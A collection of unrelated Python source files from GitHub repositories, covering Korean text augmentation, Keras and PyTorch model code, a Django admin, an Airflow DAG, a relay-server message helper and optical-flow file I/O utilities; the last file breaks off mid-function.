+{"seq_id":"36171483768","text":"\"\"\"\nCreated on 2022/09/12\n@ref https://github.com/catSirup/KorEDA/blob/master/eda.py\n\"\"\"\nimport os\nimport random\nimport re\nfrom typing import Dict, List, Optional\n\nimport joblib\nimport numpy as np\n\n\ndef _get_only_hangul(line: str) -> str:\n    parsed_text = re.sub(r\"^[ㄱ-ㅎㅏ-ㅣ가-힣]*$\", \"\", line)\n    return parsed_text\n\n\ndef _get_synonyms(word: str, wordnet: Dict[str, List[str]]) -> List[str]:\n    return wordnet[word] if word in wordnet else []\n\n\n########################################################################\n# Synonym replacement\n# Replace n words in the sentence with synonyms from wordnet\n########################################################################\ndef _synonym_replacement(\n    sentence: str, wordnet: Dict[str, List[str]], n: int\n) -> Optional[str]:\n    words = sentence.strip().split(\" \")\n\n    random_word_list = list(set(words))\n    random.shuffle(random_word_list)\n    num_replaced = 0\n\n    for random_word in random_word_list:\n        synonyms = _get_synonyms(random_word, wordnet)\n\n        if len(synonyms) >= 1:\n            synonym = random.choice(synonyms)\n            words = [synonym if word == random_word else word for word in words]\n            num_replaced += 1\n\n        if num_replaced >= n:\n            break\n\n    # Return the augmented sentence only if at least one word was replaced.\n    return \" \".join(words) if num_replaced > 0 else None\n\n\n########################################################################\n# Random deletion\n# Randomly delete words from the sentence with probability p\n########################################################################\ndef _random_deletion(sentence: str, p: float) -> Optional[str]:\n    words = 
sentence.strip().split(\" \")\n\n new_words = []\n for word in words:\n if np.random.binomial(1, p) == 0:\n new_words.append(word)\n\n if len(new_words) == 0:\n return None\n\n return \" \".join(new_words)\n\n\n########################################################################\n# Random swap\n# Randomly swap two words in the sentence n times\n########################################################################\ndef _random_swap(sentence: str, n: int) -> Optional[str]:\n new_words = sentence.strip().split(\" \")\n\n if len(new_words) == 1:\n return None\n\n for _ in range(n):\n new_words = _swap_word(new_words)\n\n return \" \".join(new_words)\n\n\ndef _swap_word(words: List[str]) -> List[str]:\n new_words = words.copy()\n\n ridx_1 = np.random.randint(len(new_words))\n ridx_2 = ridx_1\n\n counter = 0\n while ridx_2 == ridx_1:\n ridx_2 = np.random.randint(len(new_words))\n counter += 1\n if counter > 3:\n return words\n\n new_words[ridx_1], new_words[ridx_2] = (\n new_words[ridx_2],\n new_words[ridx_1],\n )\n return new_words\n\n\n########################################################################\n# Random insertion\n# Randomly insert n words into the sentence\n########################################################################\ndef _random_insertion(\n sentence: str, wordnet: Dict[str, List[str]], n: int\n) -> Optional[str]:\n new_words = sentence.strip().split(\" \")\n added = []\n for _ in range(n):\n added.append(_add_word(new_words, wordnet))\n\n return \" \".join(new_words) if any(added) else None\n\n\ndef _add_word(words: List[str], wordnet: Dict[str, List[str]]) -> bool:\n synonyms = []\n counter = 0\n while len(synonyms) < 1:\n random_word = words[np.random.randint(len(words))]\n synonyms = _get_synonyms(random_word, wordnet)\n counter += 1\n if counter > 3:\n return False\n\n random_synonym = synonyms[np.random.randint(len(synonyms))]\n ridx = np.random.randint(len(words))\n words.insert(ridx, random_synonym)\n\n return True\n\n\nclass EDA:\n def __init__(\n self,\n root_data_dir: str = \"./data\",\n p_sr: float = 0.25,\n p_ri: float = 0.25,\n p_rs: float = 0.25,\n p_rd: float = 0.25,\n alpha_sr: float = 0.1,\n alpha_ri: float = 0.1,\n alpha_rs: float = 0.1,\n alpha_rd: float = 0.1,\n num_aug: int = 9,\n ) -> None:\n self._wordnet = joblib.load(os.path.join(root_data_dir, \"wordnet.joblib\"))\n self._p_sr = p_sr\n self._p_ri = p_ri\n self._p_rs = p_rs\n self._p_rd = p_rd\n self._alpha_sr = alpha_sr\n self._alpha_ri = alpha_ri\n self._alpha_rs = alpha_rs\n self._alpha_rd = alpha_rd\n self._num_aug = num_aug\n\n def __call__(\n self,\n sentence: str,\n ) -> List[str]:\n sentence = _get_only_hangul(sentence)\n num_words = len(sentence.strip().split(\" \"))\n\n augmented_sentences = []\n num_new_per_technique = np.random.multinomial(\n self._num_aug,\n [self._p_sr, self._p_ri, self._p_rs, self._p_rd],\n )\n\n n_sr = max(1, int(self._alpha_sr * num_words))\n n_ri = max(1, int(self._alpha_ri * num_words))\n n_rs = max(1, int(self._alpha_rs * num_words))\n\n # sr\n for _ in range(num_new_per_technique[0]):\n a_sent = _synonym_replacement(sentence, self._wordnet, n_sr)\n if a_sent is not None:\n augmented_sentences.append(a_sent)\n\n # ri\n for _ in range(num_new_per_technique[1]):\n a_sent = _random_insertion(sentence, self._wordnet, n_ri)\n if a_sent is not None:\n augmented_sentences.append(a_sent)\n\n # rs\n for _ in range(num_new_per_technique[2]):\n a_sent = _random_swap(sentence, n_rs)\n if a_sent is not None:\n augmented_sentences.append(a_sent)\n\n # rd\n for 
_ in range(num_new_per_technique[3]):\n a_sent = _random_deletion(sentence, self._alpha_rd)\n if a_sent is not None:\n augmented_sentences.append(a_sent)\n\n if len(augmented_sentences) == 0:\n augmented_sentences.append(sentence)\n\n augmented_sentences = list(set(augmented_sentences))\n random.shuffle(augmented_sentences)\n\n return augmented_sentences\n","repo_name":"uoo723/BigStar-RnD-DA","sub_path":"src/eda.py","file_name":"eda.py","file_ext":"py","file_size_in_byte":6075,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"7132288091","text":"\"\"\"Base classes for supervised learning.\"\"\"\nimport importlib\nimport typing as t\nfrom dataclasses import dataclass\n\nimport datasets\nimport numpy as np\nfrom keras.layers import Layer\nfrom sklearn.metrics import classification_report\n\nfrom bnn_analysis.base.trainer import KerasTrainer\n\n\n@dataclass\nclass SupervisedDataSet:\n \"\"\"A dataset for supervised learning.\"\"\"\n\n x_train: np.ndarray\n y_train: np.ndarray\n x_test: np.ndarray\n y_test: np.ndarray\n\n @property\n def x_shape(self) -> t.Tuple[int, ...]:\n \"\"\"Return the shape of the input data.\"\"\"\n return self.x_train.shape\n\n @property\n def y_shape(self) -> t.Tuple[int, ...]:\n \"\"\"Return the shape of the output data.\"\"\"\n return self.y_train.shape\n\n def map_x(self, func: t.Callable[[np.ndarray], np.ndarray]) -> None:\n \"\"\"Apply a function to the input data.\"\"\"\n self.x_train = func(self.x_train)\n self.x_test = func(self.x_test)\n\n def map_y(self, func: t.Callable[[np.ndarray], np.ndarray]) -> None:\n \"\"\"Apply a function to the output data.\"\"\"\n self.y_train = func(self.y_train)\n self.y_test = func(self.y_test)\n\n\nclass HuggingFaceDataSet(SupervisedDataSet):\n \"\"\"A dataset for supervised learning using HuggingFace datasets.\"\"\"\n\n @classmethod\n def download(cls, name: str) -> datasets.DatasetDict:\n \"\"\"Download datasets from HuggingFace datasets.\n\n Args:\n name: Name of a dataset in HuggingFaceHub.\n\n Links:\n - https://huggingface.co/datasets\n\n \"\"\"\n return datasets.load_dataset(name) # type: ignore\n\n\nclass KerasDataSet(SupervisedDataSet):\n \"\"\"A dataset for supervised learning using Keras datasets.\"\"\"\n\n def __init__(self, name: str):\n \"\"\"Initialize the dataset.\n\n Args:\n name: Name of a submodule of keras.datasets.\n\n \"\"\"\n module = importlib.import_module(f\"keras.datasets.{name}\")\n train_data, test_data = module.load_data()\n super().__init__(*train_data, *test_data)\n\n\nclass SupervisedTrainer(KerasTrainer):\n \"\"\"Trains a keras model using its default fit method.\"\"\"\n\n def __init__(self, dataset: SupervisedDataSet):\n \"\"\"Initialize the trainer.\n\n Args:\n dataset: The dataset to train on.\n\n \"\"\"\n super().__init__()\n self.dataset = dataset\n\n @property\n def input_shape(self) -> t.Tuple[int, ...]:\n \"\"\"Return the input shape of the dataset.\"\"\"\n shape = tuple(self.dataset.x_shape[1:])\n return shape\n\n @property\n def output_shape(self) -> t.Tuple[int, ...]:\n \"\"\"Return the output shape of the dataset.\"\"\"\n if len(self.dataset.y_shape) == 1:\n return (1,)\n shape = tuple(self.dataset.y_shape[1:])\n return shape\n\n def _fit(self, **kwargs):\n \"\"\"Train the model.\"\"\"\n self.model.fit(\n self.dataset.x_train,\n self.dataset.y_train,\n validation_data=(self.dataset.x_test, self.dataset.y_test),\n **kwargs,\n )\n\n\nclass ClassificationTrainer(SupervisedTrainer):\n \"\"\"A trainer for classification 
models.\"\"\"\n\n def evaluate(self) -> t.Dict[str, t.Any]:\n \"\"\"Return classification reports for the model.\"\"\"\n report = classification_report(\n np.argmax(self.dataset.y_test, axis=1),\n np.argmax(self.model.predict(self.dataset.x_test), axis=1),\n output_dict=True,\n )\n return report\n\n\ndef train(\n dataset: SupervisedDataSet,\n layers: t.List[Layer],\n compile: t.Optional[dict] = None, # type: ignore # pylint: disable=W0622\n fit: t.Optional[dict] = None,\n problem: t.Optional[t.Literal[\"regression\", \"classification\"]] = None,\n) -> t.Optional[t.Dict[str, t.Any]]:\n \"\"\"Shortcut for building, compiling and fitting the model.\n\n Args:\n dataset: dataset to train on.\n layers: keras layers except the input layer.\n compile: model.compile kwargs.\n fit: model.fit kwargs.\n problem: problem type. If classification uses the ClassificationTrainer,\n otherwise SupervisedTrainer.\n\n Returns:\n Result of the evaluation method of the trainer.\n\n \"\"\"\n cls = ClassificationTrainer if problem == \"classification\" else SupervisedTrainer\n compile, fit = compile or {}, fit or {}\n trainer = cls(dataset)\n trainer.build(*layers, **compile)\n trainer.fit(**fit)\n return trainer.evaluate()\n","repo_name":"nickolasrm/TCC","sub_path":"bnn_analysis/base/supervised.py","file_name":"supervised.py","file_ext":"py","file_size_in_byte":4476,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"8002938942","text":"import models.blocks as B\nimport torch\nimport torch.nn as nn\n\n### Unet model\n\nclass RDNet(nn.Module):\n\n def __init__(self, in_ch=3, nf=16, res_n = 5, act_type='lrelu'):\n super(RDNet, self).__init__()\n\n ### Encoding\n self.f_ext0 = nn.Sequential(\n B.conv_block(in_nc=in_ch, out_nc=nf, \\\n kernel_size=3, stride=1, padding=1, dilation=1, \\\n bias=True, groups=1, norm_type=None, act_type=None),\n )\n\n self.f_ext1 = nn.Sequential(\n B.conv_block(in_nc=nf, out_nc=nf, \\\n kernel_size=3, stride=1, padding=1, dilation=1, \\\n bias=True, groups=1, norm_type=None, act_type=None),\n )\n\n\n\n ### Residual dense blocks\n self.rdbs = B.make_layer(B.ResidualDenseBlock_3C(nf), res_n)\n\n # self.RDB1 = B.ResidualDenseBlock_3C(nf)\n # self.RDB2 = B.ResidualDenseBlock_3C(nf)\n # self.RDB3 = B.ResidualDenseBlock_3C(nf)\n # self.RDB4 = B.ResidualDenseBlock_3C(nf)\n # self.RDB5 = B.ResidualDenseBlock_3C(nf)\n\n\n ### Feature recombination\n self.f_comb = nn.Sequential(\n B.conv_block(in_nc=nf*res_n, out_nc=nf, \\\n kernel_size=1, stride=1, padding=0, dilation=1, \\\n bias=True, groups=1, norm_type=None, act_type=None),\n B.conv_block(in_nc=nf, out_nc=nf, \\\n kernel_size=3, stride=1, padding=1, dilation=1, \\\n bias=True, groups=1, norm_type=None, act_type=None),\n )\n\n ### Decoding\n self.dec = nn.Sequential(\n B.conv_block(in_nc=nf, out_nc=3, \\\n kernel_size=3, stride=1, padding=1, dilation=1, \\\n bias=True, groups=1, norm_type=None, act_type=None),\n )\n\n\n self.end_conv = nn.Conv2d(in_channels = nf, out_channels = in_ch, kernel_size = 1, stride = 1, padding = 0)\n\n def forward(self, x):\n\n idt = x\n h = self.f_ext0(x)\n grl = h\n h = self.f_ext1(h)\n\n ress = []\n for rdb in self.rdbs:\n h = rdb(h)\n ress.append(h)\n\n h = torch.cat(ress, 1)\n h = self.f_comb(h)\n\n h = self.dec(torch.add(h, grl))\n out = h + idt\n\n\n return 
out\n","repo_name":"TheZino/Laplacian-Encoder-Decoder-Raindrop-Removal","sub_path":"source/models/RDNet.py","file_name":"RDNet.py","file_ext":"py","file_size_in_byte":2328,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"27347412204","text":"import numpy as np\nimport quaternion\n\n#i2 = j2 = k2 = ijk = -1\n\nquaternion(1, 0, 0, 0)\n\nq1 = np.quaternion(1,2,3,4)\nq2 = np.quaternion(5,6,7,8)\nq1 * q2\nquaternion(-60, 12, 30, 24)\na = np.array([q1, q2])\na\narray([quaternion(1, 2, 3, 4), quaternion(5, 6, 7, 8)],dtype=quaternion)\nexp(a)\narray([quaternion(1.69392, -0.78956, -1.18434, -1.57912),\n quaternion(138.909, -25.6861, -29.9671, -34.2481)], dtype=quaternion)\n\n# The following ufuncs are implemented:\n# add, subtract, multiply, divide, log, exp, power, negative, conjugate,\n# copysign, equal, not_equal, less, less_equal, isnan, isinf, isfinite,\n# absolute\n\n# Quaternion components are stored as doubles. The package could be extended\n# to support e.g. qfloat, qdouble, qlongdouble\n","repo_name":"fovtran/PyGame_samples","sub_path":"MyTools/Quaternion/quaternion_numpy.py","file_name":"quaternion_numpy.py","file_ext":"py","file_size_in_byte":743,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"72300973523","text":"from numbers import Real\n\n\ndef integer_check(arg_name: str, arg_value: int, min_value=None, max_value=None):\n \"\"\"validates that arg_value is an integer and can't be negative\"\"\"\n if not isinstance(arg_value, Real):\n raise TypeError(f\"{arg_name} must be an integer\")\n elif arg_value < 0:\n raise ValueError(f\"{arg_name} can't be negative\")\n elif (min_value is not None \n and arg_value < min_value\n ):\n raise ValueError(\n f\"{arg_name} cannot be less than {min_value} \"\n )\n elif (max_value is not None \n and arg_value > max_value\n ):\n raise ValueError(\n f\"{arg_name} cannot be more than {max_value} \"\n )\n else:\n return arg_value\n","repo_name":"juliashal/Python---Deep-Dive-course","sub_path":"Part 4 - OOP/Single Inheritance/app/utils/validators.py","file_name":"validators.py","file_ext":"py","file_size_in_byte":737,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"31871050700","text":"import json\n\nTYPE = ('signup', 'login', 'logout', 'command', 'request', 'management', 'show')\n'''\n{type: '', data: ''}\nxen handler --> instance 생성 시 instance id db에 저장\n\nsignup --> id, password \nlogin --> id, password\nlogout --> id, session ------------from client to relay\ncommand --> category(create, modify, delete, run, stop), session(key = session), detail(id포함)/ run, stop\n--> uuid or instance name\ninfo\nrequest\n'''\n\n\ndef get_type(req_type):\n\treturn TYPE.index(req_type)\n\n#data:list -- accept : data == session\ndef encapsulate(request_type, data, session=''):\n\tdata_unit = {'type':'' ,'data':{}}\n\tdata_unit['type'] = request_type\n\treq_num = get_type(request_type)\n\t#key 값이 없을 경우 예외처리\n\tif req_num == 0 or req_num == 1: \n\t\tdata_unit['data']['id'] = data[0]\n\t\tdata_unit['data']['password'] = data[1]\n\telif req_num == 2:\n\t\tdata_unit['data']['id'] = data[0]\n\telif req_num == 3:\n\t\t#command\n\t\tdata_unit['data']['category'] = data[0]\n\t\tdata_unit['data']['detail'] = data[1]#dict e.g., {cpu:asdf, mem:asdf, size:asdf...}\n\t\tdata_unit['data']['session'] = session\n\telif req_num == 4:\n\t\t#accept\n\t\tdata_unit['data']['id'] = 
\ndef extract(data_unit):\n\t# request_type : str\n\trequest_type = data_unit['type']\n\t# data : dict\n\tdata = data_unit['data']\n\n\treturn request_type, data\n\n\n\n","repo_name":"Greenun/NetProject","sub_path":"RelayServer/transfer_unit.py","file_name":"transfer_unit.py","file_ext":"py","file_size_in_byte":1616,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"29540461528","text":"from django.conf.urls import url\nfrom django.contrib import admin\nfrom django.core.urlresolvers import reverse\nfrom django.http import HttpResponseRedirect\nfrom django.utils.html import format_html\n\nfrom boats.models import Boat, Image\n\n\nclass ImageInline(admin.StackedInline):\n    model = Image\n    extra = 1\n    ordering = ('ordering',)\n    exclude = ('ordering',)\n\n\nclass BoatAdmin(admin.ModelAdmin):\n    inlines = [ImageInline]\n    ordering = ('order',)\n    list_display = ('id', '__unicode__', 'boat_actions')\n    list_display_links = ('__unicode__',)\n    readonly_fields = ('boat_actions',)\n\n    def get_urls(self):\n        urls = super(BoatAdmin, self).get_urls()\n        custom_urls = [\n            url(r'^(?P<boat_id>.+)/move-up/$', self.admin_site.admin_view(self.move_up), name='boat-move-up'),\n            url(r'^(?P<boat_id>.+)/move-down/$', self.admin_site.admin_view(self.move_down), name='boat-move-down'),\n        ]\n        return custom_urls + urls\n\n    def boat_actions(self, obj):\n        return format_html(\n            '<a href=\"{}\">Move Up</a> '\n            '<a href=\"{}\">Move Down</a>',\n            reverse('admin:boat-move-up', args=[obj.pk]),\n            reverse('admin:boat-move-down', args=[obj.pk]),\n        )\n    boat_actions.short_description = 'Actions'\n    boat_actions.allow_tags = True\n\n    def move_up(self, request, boat_id):\n        boat = Boat.objects.get(id=boat_id)\n        boat.move_order_up()\n        return HttpResponseRedirect(reverse('admin:boats_boat_changelist'))\n\n    def move_down(self, request, boat_id):\n        boat = Boat.objects.get(id=boat_id)\n        boat.move_order_down()\n        return HttpResponseRedirect(reverse('admin:boats_boat_changelist'))\n\n\nadmin.site.register(Boat, BoatAdmin)\n","repo_name":"ClassicBoatsNJ/cbnj-django","sub_path":"boats/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1781,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"17299280444","text":"from airflow import DAG\nfrom airflow.operators.python_operator import PythonOperator\n\nfrom datetime import datetime, timedelta\n\ndefault_args = {\n    'start_date': datetime(2022, 1, 1),\n    'owner': 'Airflow'\n}\n\ndef first_task():\n    print('This is first task')\n\ndef second_task():\n    print('This is second task')\n\ndef third_task():\n    print('This is third task')\n\nwith DAG(dag_id='depends_on_past', schedule_interval=\"0 0 * * *\", default_args=default_args, tags=['basic_dags'], catchup=True) as dag:\n\n    task_1 = PythonOperator(task_id='task_1', python_callable=first_task)\n\n    task_2 = PythonOperator(task_id='task_2', python_callable=second_task, depends_on_past=True)\n\n    task_3 = PythonOperator(task_id='task_3', python_callable=third_task)\n\n    task_1 >> task_2 >> 
task_3","repo_name":"technoavengers/airflow-training","sub_path":"dags/basic_dags/depends_on_past.py","file_name":"depends_on_past.py","file_ext":"py","file_size_in_byte":788,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"32588640409","text":"from _util_202303 import sys_cmd, prCyan, api_upscale\r\nfrom _util_openai import zh_txt_2_en_txt, zh_txt_2_en_prompt\r\n\r\n_txt_out_dir = \"F:\\\\_workflow\\\\tmp\\\\test\"\r\n_img_out_dir = \"F:\\\\_workflow\\\\tmp\\\\test\"\r\n\r\n_user_conf_json = [\r\n # 'ci-i2i-user-i2i-ctrl-bj.json',\r\n 'ci-i2i-user-i2i-ctrl-xg.json',\r\n # 'ci-i2i-user-i2i-ctrl-fg.json',\r\n # 'ci-i2i-user-i2i.json',\r\n # 'ci-i2i-user-t2i-ctrl-kl.json',\r\n # 'ci-i2i-user-t2i.json',\r\n]\r\n\r\n# for i in _user_conf_json:\r\n# cmd_ci_i2i = f\"python ci-i2i-202303.py -txtoutdir {_txt_out_dir} -imgoutdir {_img_out_dir} -userconf {i}\"\r\n# prCyan(cmd_ci_i2i)\r\n# sys_cmd(cmd_ci_i2i)\r\n\r\n# api_upscale(\"F:\\\\_workflow\\\\tmp\\\\test\\\\xg_sd1_00_1678872845_0.png\")\r\n\r\n# print(isChinese('测试'))\r\n\r\n_txt = \", ty3Dbear, 考拉在公园里放风筝\"\r\n\r\n# _txt = \"\"\"Ignore previous instructions. As a stable-diffusion prompt engineer, you need to write stable-diffusion prompts. The basic rule is that the most important keywords are at the beginning and then every additional keywords are separated by a comma. If you add an art style by an artist or multiple artists, this information should always be at the end.\r\n# For example, if you need to write a prompt of an image of cartoon character for kids, you probable write is as \r\n# \"very cute kid's film character, disney pixar zootopia character concept artwork, 3d concept, high detail iconic character for upcoming film, trending on artstation, character design, 3d artistic render, highly detailed, cartoon\"\r\n# By using a similar syntax, please write me a clean and precise prompt an image of content for kids.\"\"\"\r\n\r\n\r\n# {{Prompt}}, anthro, very cute kid's film character, disney pixar zootopia character concept artwork, 3d concept, detailed fur, high detail iconic character for upcoming film, trending on artstation, character design, 3d artistic render, highly detailed, octane, blender, cartoon, shadows, lighting\r\n\r\n\r\n\r\nprint(zh_txt_2_en_prompt(_txt))\r\nprint(zh_txt_2_en_txt(_txt))\r\n\r\n","repo_name":"yiouyou/ty_workflow","sub_path":"ci-i2i-202303/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2025,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"40226077809","text":"import sys\nimport glob\nimport time\nimport datetime\nfrom pathlib import Path\nfrom collections import deque, Counter\nimport cv2\nimport re\nimport gzip\nimport pickle\nimport io\nimport numpy as np\nimport einops\nimport os\nimport torch\nfrom PIL import Image\nfrom PIL.PngImagePlugin import PngInfo\nimport shutil\nfrom MFT.utils.misc import ensure_numpy\nimport tqdm\n\nimport logging\nlogger = logging.getLogger(__name__)\n\n\ndef get_frames(path):\n paths = glob.glob(f'{path}/*.jpg')\n return sorted([Path(path) for path in paths])\n\n\ndef video_seek_frame(time_string, fps=30):\n parsed_time = time.strptime(time_string, \"%H:%M:%S\")\n delta = datetime.timedelta(hours=parsed_time.tm_hour, minutes=parsed_time.tm_min, seconds=parsed_time.tm_sec)\n time_seconds = int(delta.total_seconds())\n pos = fps * time_seconds\n return pos\n\n\ndef video_seek_frame_name(query_frame_name, frame_paths):\n frame_names = 
[path.stem for path in frame_paths]\n    regexp = re.compile(r'0*' + query_frame_name)\n    for i, name in enumerate(frame_names):\n        if re.match(regexp, name):\n            return i\n    raise ValueError(f\"Frame {query_frame_name} not found.\")\n\n\ndef frames_from_time(directory, time_string, fps=30):\n    frames = get_frames(directory)\n    start_index = video_seek_frame(time_string, fps)\n\n    for i in range(start_index, len(frames)):\n        yield (frames[i], cv2.imread(str(frames[i])))\n\n\ndef frames_from_name(directory, start_name):\n    frames = get_frames(directory)\n    start_index = video_seek_frame_name(start_name, frames)\n\n    for i in range(start_index, len(frames)):\n        yield (frames[i], cv2.imread(str(frames[i])))\n\n\nclass LookaheadIter:\n\n    def __init__(self, it):\n        self._iter = iter(it)\n        self._ahead = deque()\n\n    def __iter__(self):\n        return self\n\n    def __next__(self):\n        if self._ahead:\n            return self._ahead.popleft()\n        else:\n            return next(self._iter)\n\n    def lookahead(self):\n        for x in self._ahead:\n            yield x\n        for x in self._iter:\n            self._ahead.append(x)\n            yield x\n\n    def peek(self, *a):\n        return next(iter(self.lookahead()), *a)\n\n\ndef load_maybe_gzipped_pkl(path):\n    suffix = Path(path).suffix\n    if suffix == '.pklz':\n        open_fn = gzip.open\n    elif suffix == '.pkl':\n        open_fn = open\n    else:\n        raise ValueError(f\"Unknown pickle file suffix ({suffix}).\")\n\n    with open_fn(path, 'rb') as fin:\n        data = pickle.load(fin)\n\n    return data\n\n\nclass CPU_Unpickler(pickle.Unpickler):\n    \"\"\" https://github.com/pytorch/pytorch/issues/16797#issuecomment-633423219\n    I have pickled something in meta as a GPU tensor...\"\"\"\n\n    def find_class(self, module, name):\n        import torch\n\n        if module == 'torch.storage' and name == '_load_from_bytes':\n            return lambda b: torch.load(io.BytesIO(b), map_location='cpu')\n        else:\n            return super().find_class(module, name)\n\n\ndef load_cpu_pickle(path):\n    if not Path(path).exists():\n        raise FileNotFoundError(f\"No pickle at {path}\")\n    try:\n        exception = gzip.BadGzipFile  # new in python 3.8\n    except AttributeError:\n        exception = OSError\n\n    try:\n        with gzip.open(path, 'rb') as fin:\n            unpickler = CPU_Unpickler(fin)\n            data = unpickler.load()\n    except exception:  # we didn't compress this one...\n        with open(path, 'rb') as fin:\n            unpickler = CPU_Unpickler(fin)\n            data = unpickler.load()\n    return data\n\n\ndef read_flow_png(path):\n    \"\"\"Read png-compressed flow\n\n    Args:\n        path: png flow file path\n\n    Returns:\n        flow: (H, W, 2) float32 numpy array (delta-x, delta-y)\n        valid: (H, W) float32 numpy array\n    \"\"\"\n    # to specify not to change the image depth (16bit)\n    flow = cv2.imread(str(path), cv2.IMREAD_ANYDEPTH | cv2.IMREAD_COLOR)\n    flow = flow[:, :, ::-1].astype(np.float32)\n    # flow shape (H, W, 2) valid shape (H, W)\n    flow, valid = flow[:, :, :2], flow[:, :, 2]\n    flow = (flow - 2**15) / 32.0\n    return flow, valid\n\n\ndef write_flow_png(path, flow, valid=None):\n    \"\"\"Write a compressed png flow\n\n    Args:\n        path: write path\n        flow: (H, W, 2) xy-flow\n        valid: None, or (H, W) array with validity mask\n    \"\"\"\n    flow = 32.0 * flow + 2**15  # compress (resolution step 1/32, maximal flow 1024 (same as Sintel width))\n    if valid is None:\n        valid = np.ones([flow.shape[0], flow.shape[1], 1])\n    else:\n        valid = einops.rearrange(valid, 'H W -> H W 1', **einops.parse_shape(flow, 'H W _'))\n    data = np.concatenate([flow, valid], axis=2).astype(np.uint16)\n    cv2.imwrite(str(path), data[:, :, ::-1])\n\n\n# flow is encoded with sign, so 2**15, occlusion and uncertainty without sign, so 2**16:\nFLOWOU_IO_FLOW_MULTIPLIER = 2**5  # max-abs-val = 2**(15-5) = 1024, step = 2**(-5) = 0.03\nFLOWOU_IO_OCCLUSION_MULTIPLIER = 2**15  # max-val = 2**(16-15) = 2, step = 2**(-15) = 3e-5\nFLOWOU_IO_UNCERTAINTY_MULTIPLIER = 2**9  # max-val = 2**(16-9) = 128, step = 2**(-9) = 0.0019\n
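\n# Worked example of the fixed-point scheme (numbers are illustrative): a flow\n# component of -3.14 is stored as uint16(2**15 + 32 * -3.14) = 32667 and decoded\n# back as (32667 - 2**15) / 32 = -3.15625, i.e. accurate to the 1/32 step.\n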
\ndef write_flowou(path, flow, occlusions, uncertainty):\n    \"\"\"Write a compressed png flow, occlusions and uncertainty\n\n    Args:\n        path: write path (must have \".flowou.png\", \".flowouX16.pkl\", or \".flowouX32.pkl\" suffix)\n        flow: (2, H, W) xy-flow\n        occlusions: (1, H, W) array with occlusion scores (1 = occlusion, 0 = visible)\n        uncertainty: (1, H, W) array with uncertainty sigma\n    \"\"\"\n    suf = Path(path).suffixes[0]\n    if suf == '.flowou':\n        write_flowou1_png(path, flow, occlusions, uncertainty)\n    elif suf == '.flowouX16':\n        write_flowou_X16(path, flow, occlusions, uncertainty)\n    elif suf == '.flowouX32':\n        write_flowou_X32(path, flow, occlusions, uncertainty)\n    elif suf == '.stepan16':\n        write_flowou_stepan16(path, flow, occlusions, uncertainty)\n    else:\n        raise ValueError(f\"Incorrect flowou path suffix: {Path(path).suffixes}\")\n\n\ndef read_flowou(path):\n    \"\"\"Read png-compressed flow, occlusions and uncertainty\n\n    Args:\n        path: \".flowou.png\", \".flowouX16.pkl\", or \".flowouX32.pkl\" file path\n\n    Returns:\n        flow: (2, H, W) float32 numpy array (delta-x, delta-y)\n        occlusions: (1, H, W) float32 array with occlusion scores (1 = occlusion, 0 = visible)\n        uncertainty: (1, H, W) float32 array with uncertainty sigma (0 = dirac)\n    \"\"\"\n    suf = Path(path).suffixes[0]\n    if suf == '.flowou':\n        return read_flowou1_png(path)\n    elif suf == '.flowouX16':\n        return read_flowou_X16(path)\n    elif suf == '.flowouX32':\n        return read_flowou_X32(path)\n    else:\n        raise ValueError(f\"Incorrect flowou path suffix: {Path(path).suffixes}\")\n\n\ndef write_flowou1_png(path, flow, occlusions, uncertainty):\n    \"\"\"Write a compressed png flow, occlusions and uncertainty\n\n    Args:\n        path: write path (must have \".flowou.png\" suffix)\n        flow: (2, H, W) xy-flow\n        occlusions: (1, H, W) array with occlusion scores (1 = occlusion, 0 = visible), clipped between 0 and 1\n        uncertainty: (1, H, W) array with uncertainty sigma, clipped between 0 and 127\n                     (0 = dirac, max observed on Sintel = 215, Q0.999 on sintel ~ 15)\n    \"\"\"\n    def encode_central(xs, multiplier=32.0):\n        max_val = 2**15 / multiplier\n        assert np.all(np.abs(xs) < max_val), \"out-of-range values - cannot be written\"\n        return 2**15 + multiplier * xs\n\n    def encode_positive(xs, multiplier=32.0):\n        max_val = 2**16 / multiplier\n        assert np.all(xs >= 0), \"out-of-range values - cannot be written\"\n        assert np.all(xs < max_val), \"out-of-range values - cannot be written\"\n        return multiplier * xs\n\n    assert Path(path).suffixes == ['.flowou', '.png']\n    path.parent.mkdir(parents=True, exist_ok=True)\n    einops.parse_shape(flow, 'H W xy')\n    flow = encode_central(einops.rearrange(flow, 'xy H W -> H W xy', xy=2),\n                          multiplier=FLOWOU_IO_FLOW_MULTIPLIER)\n\n    occlusions = np.clip(occlusions, 0, 1)\n    occlusions = encode_positive(einops.rearrange(occlusions, '1 H W -> H W 1', **einops.parse_shape(flow, 'H W _')),\n                                 multiplier=FLOWOU_IO_OCCLUSION_MULTIPLIER)\n\n    uncertainty = np.clip(uncertainty, 0, 127)\n    uncertainty = encode_positive(einops.rearrange(uncertainty, '1 H W -> H W 1', **einops.parse_shape(flow, 'H W _')),\n                                  multiplier=FLOWOU_IO_UNCERTAINTY_MULTIPLIER)\n\n    data = np.concatenate([flow, occlusions, uncertainty], axis=2).astype(np.uint16)\n    cv2.imwrite(str(path), 
